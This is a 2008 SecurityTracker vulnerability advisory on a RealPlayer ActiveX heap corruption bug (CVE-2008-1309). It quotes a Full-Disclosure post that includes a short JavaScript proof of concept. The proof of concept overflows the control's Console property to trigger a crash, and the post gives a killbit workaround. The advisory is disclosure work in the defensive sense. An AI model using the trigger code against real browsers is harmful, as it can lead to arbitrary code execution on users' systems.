SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   RealOne (RealPlayer) Vendors:   RealNetworks
RealPlayer ActiveX Control Memory Corruption Bug May Let Remote Users Execute Abitrary Code
SecurityTracker Alert ID:  1019576
SecurityTracker URL:  http://securitytracker.com/id/1019576
CVE Reference:   CVE-2008-1309   (Links to External Site)
Updated:  Mar 19 2008
Original Entry Date:  Mar 11 2008
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): rmoc3260.dll version 6.0.10.45
Description:   A vulnerability was reported in RealPlayer. A remote user may be able to cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a memory corruption error in 'rmoc3260.dll' and potentially execute arbitrary code on the target system. The code will run with the privileges of the target user.

The CLSIDs of the vulnerable control are: 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93, CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA

Elazar Broad reported this vulnerability.

Impact:   A remote user can create HTML that, when loaded by the target user, may execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.real.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Who:
Real Networks
http://www.real.com

What:
Real Networks Real Player is a popular media player.

How:
Real Player utilizes an ActiveX control to play content within the
users browser.

rmoc3260.dll version 6.0.10.45
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}

It is possible to modify heap blocks after they are freed and
overwrite certain registers, possibly allowing code execution. Like
so:

- ------------
var buf = '';
while (buf.length < 1005) buf = buf + 'A';

m = obj.Console;
obj.Console = buf;
obj.Console = m

//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- -------------

Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Working on it

Elazar
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkfUzEEACgkQi04xwClgpZhsDQP+OPMkrAZcp/kR1MCleBervmVYPRc1
2cMRLBbhFcUC7Uc/ajXmKe6naZEr1RqKzHBrugWZeANkP5gdk/Kd/fOXacCZcVApXSJj
OcopiKRr7tnTi13Rt4XW4oBRjpiWHyHxFZA06Jzc2JJHeF7sTrew+s43PTU1eaj9/w4o
Nf0Ydt8=
=IpTC
-----END PGP SIGNATURE-----

--
Energy Saving Heating and Cooling Systems. Click for free information.
http://tagline.hushmail.com/fc/Ioyw6h4dbo0qfLJjDSbocxFRYwpBkZwjS6vzQEbs8WmdoAPvpevJZe/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC